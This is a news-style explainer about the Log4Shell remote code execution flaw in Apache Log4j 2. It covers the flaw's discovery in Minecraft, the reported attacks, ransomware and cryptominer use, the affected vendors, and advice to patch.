The ‘Log4Shell’ vulnerability in the Java-based Log4j library, present in the computing infrastructure of millions of companies worldwide, has been dubbed “a design failure of catastrophic proportions” by security researchers as it continues to cause problems for Big Tech and beyond.
IT teams around the world are scrambling to instate adequate security measures to deal with the onslaught of threat actors looking to exploit it, with some describing it as the worst software flaw to emerge in the wild in over a decade – and perhaps in the history of modern computing.
The good news is that there is a patch available to reduce the risk to your business, read on to find out more.
How was the Log4Shell Vulnerability Discovered?
Log4Shell is a vulnerability found in the open-source logging tool Log4J 2. It’s a zero-day vulnerability, which means it’s been spotted now but exploited for some time.
Log4J is part of a Java-based Apache code library that is present in cloud servers, software, and online services used across all industries and governments. As tools go, it's about as ubiquitous as it can get. Globally, millions of servers have the logging tool installed.
“I've worked in security for 30 years, and always tried to avoid alarmist, “the sky is falling” positions. But now is the time for alarm — the vulnerability known as Log4Shell presents a grave danger to nearly all digital infrastructure” – Amit Yoran, Tenable CEO
The vulnerability was initially spotted in the game Minecraft. According to the Guardian, users were able to execute commands on other users’ computers by simply posting a message in a chat box.
Why is it so Dangerous?
What makes the exploit so dangerous is the control it can grant a malicious actor over a given system, but also because it’s just as easy to exploit in other environments and systems as it is in Minecraft.
Log4Shell is defined as a Remote Code Execution vulnerability, allowing attackers to run whatever code they want on an affected server. By exploiting the vulnerability, they can access parts of company networks that aren’t even connected to the internet.
A specially crafted string (data used to create software) just needs to be processed by the vulnerable component of Log4J 2, and hackers can do this remotely – certain commands (like cURL) can be used to ensure the system reads the string.
Once a threat actor breaks in, data can be erased, stolen or changed, malware can be inserted into systems and various other categories of malicious activity can take place.
What Services are Affected?
Countries seemingly experiencing the attacks (tracked by how many attempts are blocked) are the United States, the United Kingdom, Germany and Turkey.
Companies, products, and services that have confirmed their systems are vulnerable to the threat include Microsoft, Twitter, Tesla, Google, Amazon, IBM, LinkedIn, Baidu, SolarWinds, Zoho, Cisco (including Webex), Atlassian, and hundreds of thousands of others.
Why is Everybody Panicking?
The ominous answer is, unfortunately, because this is really serious. Not only is the vulnerability very easily exploitable, but due to the dependencies attached to it, actually fixing it without disrupting other parts of any given system will be difficult.
The vulnerability, worryingly, is now fully weaponized, which means that not only are threat actors exploiting the vulnerability, they’re actively distributing tools for others to do the same.
Cybersecurity firm Check Point revealed on Monday that, since the weekend, there have been over 830,000 attacks using the exploit. Some hackers are using it to enter vulnerable systems and install malware like Kinsing, which will start mining for cryptocurrency when executed.
Security researchers at BitDefender have identified the exploit being used to load systems with ransomware from the Khonsari ransomware family.
What Can I Do to Mitigate the Threat to my Business?
If you don’t have some sort of antivirus software installed on your computer or network, now is the time to get it downloaded and kick out any potential network intruders exploiting this issue.
Apache has already released an update that will help shore up the vulnerability. However, because it’s just so widespread, and used in so many systems, security teams are going to be hard tasked to root out all of the instances and patch them.
Regularly scanning for intruders on your computer systems is of tantamount importance at present.
Installing this patch is your best line of defence, but if you’re a part of a business trying to defend itself from this threat and your systems cannot be updated immediately, security firm Cybereason have created a patch which it states can disable the vulnerability. You'll need basic Java skills to implement this patch.